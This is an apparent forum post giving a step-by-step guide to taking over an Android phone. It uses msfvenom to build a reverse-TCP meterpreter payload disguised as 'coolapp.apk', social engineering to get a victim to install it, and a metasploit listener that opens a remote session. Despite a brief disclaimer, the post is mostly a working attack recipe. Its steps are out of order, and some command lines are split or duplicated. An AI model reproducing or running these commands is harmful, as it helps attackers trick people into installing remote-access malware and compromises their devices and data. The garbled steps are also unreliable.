0
How to Hack an Android device on the same Wi-Fi Network
Posted by zuhaircmr
Disclaimer: Hacking other devices on Wireless Networks (Wi-Fi) without explicit written permission is illegal, unless you are the legal owner of the devices you want to hack and the wireless network.
Hit enter, Now use some social engineering tricks like sending them a mail or send via bluetooth to give the file on the desktop titled, coolapp.apk, to someone who will open(click on install>&open) it on their android phone. Once you have given the app and they are about to open it, go back to your metasploit console and type:
Its just a simple Trick. All you need is our dear metasploit, and a bit of social engineering skills.
Here my ip is 192.168.1.33 and the system i am going to hack is of ip 192.168.1.34
Open a terminal(as root-sudo terminator), and put in:
msfvenom -p android/meterpreter/rever se_tcp LHOST=(your lan ip address) LPORT=8080 R > /home/root/coolapp.apk
eg : msfvenom -p android/meterpreter/rever se_tcp LHOST=192.168.1.33 LPORT=8080 R > /home/root/coolapp.apk
This command should give you a file called coolapp.apk on the desktop. Now we need to set up a listener so that when the target opens the app, we have their android hacked. :D
Open the metasploit console by typing "msfconsole" & Type :
use exploit/multi/handler
Hit return and follow as I do 1by1.
set payload android/meterpreter/rever se_tcp
set payload android/meterpreter/rever
set lhost (your lan ip address)
set lport 8080

exploit